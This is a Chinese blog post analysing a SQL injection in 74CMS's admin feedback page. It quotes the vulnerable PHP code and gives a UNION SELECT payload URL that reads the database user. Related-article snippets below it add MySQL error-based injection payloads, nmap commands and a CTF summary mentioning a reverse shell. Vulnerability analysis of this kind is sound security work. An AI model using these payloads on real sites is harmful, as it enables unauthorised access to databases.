sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网

最新推荐文章于 2024-09-27 15:28:35 发布
最新推荐文章于 2024-09-27 15:28:35 发布
阅读量233 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: sql注入pythonpoco
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39753213/article/details/114000537
该博客详细解析了admin_feedback.php中存在SQL注入漏洞,涉及reporttype和audit参数。通过get_report_list函数中的代码,攻击者可以构造payload进行恶意操作,强调了输入验证和安全防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

摘要

漏洞文件:admin/admin_feedback.php代码82行: 跟下get_report_list:  $_GET[‘reporttype’]

漏洞文件:admin/admin_feedback.php

代码82行:

if (!empty($_GET['reporttype']))          {                    $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];          }          if (!empty($_GET['audit']))          {                    $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];          }          $total_val=$db->get_total($total_sql);          $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));          $currenpage=$page->nowindex;          $offset=($currenpage-1)*$perpage;          $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);          $smarty->assign('pageheader',"举报信息");          $smarty->assign('list',$list);          $smarty->assign('page',$page->show(3));

跟下get_report_list:

function get_report_list($offset,$perpage,$get_sql= '',$type) {     global $db;     $limit=" LIMIT ".$offset.','.$perpage;     if($type==1){        $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));        $row_arr[] = $row;        }     }else{        $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));        $row_arr[] = $row;         }     }     return $row_arr; }

$_GET['reporttype']

$_GET['audit']

没有’包含。

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23

4effecaa64b609d4ddfc0ae4e6c3e4df.png

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 2250
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞
weixin_59047731的博客
07-26 267
鹰图语法fofa语法。
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 189
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入pythonpoco_Dapper和SQL注入
weixin_39951930的博客
12-11 158
Dapper如何幫助防止SQL注入?這使得完全參數化數據訪問變得非常非常容易,無需連接輸入。特別是,因為你並不需要通過大量的“20參數添加參數,設置參數類型,檢查空,因為ADO.NET有蘇茨基空處理 ,沖洗/重複”地跳,通過使參數處理愣神方便。它還使得將行轉換為對像變得非常簡單,避免了使用DataTable的誘惑...每個人都獲勝。來自評論:還有一個......那個小巧玲瓏實際上有什麼幫助呢?回答...
骑士cms最新全局SQL注入(官方奇葩修复案例)
koothon的专栏
07-17 2281
这个漏洞,我们看看骑士怎么修复的 http://wwwcto2uploudpic/Article/201412/359995.html 首先试试带入单引号,用宽字节试试,可以看到显示数据库出错   看看数据库怎么带入的吧 可以看到出错了,单引号被带入sql语句了 居然还可以注入,没有过滤 找到/include/m
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 164
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
LampSecurityCTF7 靶机渗透 (sql 注入, 文件上传, 密码喷射)
m0_63416413的博客
09-27 1594
主机扫描,我们比较感兴趣的端口有 80, 8080爆一下 80 端口的目录,80 端口是一个 cms,爆破使用 dirb8080是 cms 后台的页面,sql 注入万能密码登录进入在后台传个反弹 shell,在爆破目录 asset 中找到 shell 的上传位置kali 拿到 shell 后使用 python 升级 shell继续在内网中收集信息,发现数据库连接的配置文件使用 mysql 进入数据库,账号为 root,密码为空。
渊龙sec靶场SQL注入漏洞
最新发布
03-10
### 关于渊龙 Sec 靶场中的 SQL 注入漏洞及其解决方案 #### 定义与背景 SQL注入是一种常见的安全漏洞,允许攻击者通过操纵输入数据来执行未授权的数据库命令。在Web应用程序中,如果开发者未能正确处理用户输入,则...
Sqlmap速查表/功能移植/Python批量检测SQL注入
浪子燕青的博客
03-11 1657
title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap] categories: 安全开发 permalink: password: keywords: description: Sqlmap速查,对其WAF识别功能移植,对其Sql注入的payload进行移植,完成Python批量检测SQL注入。 今天的剑桥对我而言只是一百年前那个剑桥的幻影,但我还会不由自主.
74cms安全漏洞 EXP:SQL注入攻击利用方法
74cms漏洞EXP是针对特定版本的74cms网站管理系统的安全漏洞利用脚本,它发生在2011年10月5日,由90sec团队发现并由mer4en7y编写。该漏洞主要涉及到网站的登录验证过程中的SQL注入风险。漏洞利用者可以通过构造恶意...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
sql注入pythonpoco_ctf学习
weixin_42176612的博客
01-30 154
CTF学习Webnmapnmap常用的扫描命令是:nmap -sS -sV-p- 192.168.1.1或nmap -v -T4 -A 192.168.1.1/24Sql注入利用报错注入:updatexml:爆破数据库版本Payload:?id=1'+updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)%23常见的注入点位置:GET参数:最容易发现...
骑士CMS SQL注入漏洞
收集盒 Book box
07-02 2540
影响版本: 通杀 程序介绍:  骑士CMS人才系统,PHP人才招聘程序 (www.74cms.com/) 漏洞文件: ajax_output.php预览源代码打印关于1 $category_id=trim($_GET['category_id']);  2  3 if (($category_id+0)>0 && intval($category_id)==$cate
骑士CMS模版注入+文件包含getshell复现
黑白的博客
05-03 1260
声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围 骑士 CMS < 6.0.48 复现过程 这里使用6.0.20版本 使用phpstudy小白皮,好用的1P
sql注入pythonpoco_Flask和Django有什么不同和区别?
weixin_39581739的博客
12-11 160
本文概述Django和Flask是Python的网络框架。众所周知, Python是最通用的编程语言, 它提供了广泛的Web框架。 Web开发人员可以选择这些框架。程序员可以灵活地利用全栈Python Web框架。它增强了复杂Web应用程序的开发。 Python还提供了一个选项, 可以选择微型和轻量级的Python Web框架来构建简单的Web应用程序, 而无需花费额外的时间和精力。Django和...
动态调试|Maccms SQL 注入分析(附注入盲注脚本)
xiaoi123的博客
08-28 1055
0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文。 0x02 环境 Web: phpstudy System: Windows 10 X64 Browser: Firefox Quantum Python version : 2.7 Tools: JetBrains PhpStorm 2018.1.6 x64、Se...
骑士CMS4.1.23本地包含漏洞
pygain的博客
02-27 3365
0x00 在骑士CMS最新版的 index.php页面对$type 调用了display方法  这里的display使用的ThinkPHP的模板展示方法 参数后可直接调用安装目录下的任意文件以PHP形式运行 建议通过绕过上传.html或.txt文件 再进行远程包含即可 具体操作如下图 0x01 直接调用不进行审查 0x02 payload 0x03 在回包中
SQL注入
heiseweiye的博客
10-05 530
一、MySQL注入 1. 常用信息查询 常用信息: 当前数据库名称:database() 当前用户:user() current_user() system_user() 当前数据库版本号:@@version version() 系统类型:@@version_compile_os 错误日志存储位置:@@log_error 数据库存储位置:@@datadir 系统数据库: 所有数据库:SELECT ...
怎么修复网站漏洞 骑士cms的漏洞修复方案
网站安全专家
01-03 877
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号密码以及用户账号信息. 目前很多人才网站都使用的骑士CMS系统,受影响的网站较多,关于该网站漏洞的详情我们来详细的分析一下。骑士cms4.2最新版本使用了thinkphp...
JAVA网络爬虫检测SQL注入技术
在介绍知识点之前,首先要明确“SQL注入”是一种常见的针对数据库系统的安全攻击技术,它通过在Web表单输入或通过URL传递恶意SQL代码,试图对数据库进行未经授权的查询或操作。本知识点将详细讲述使用JAVA实现对Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值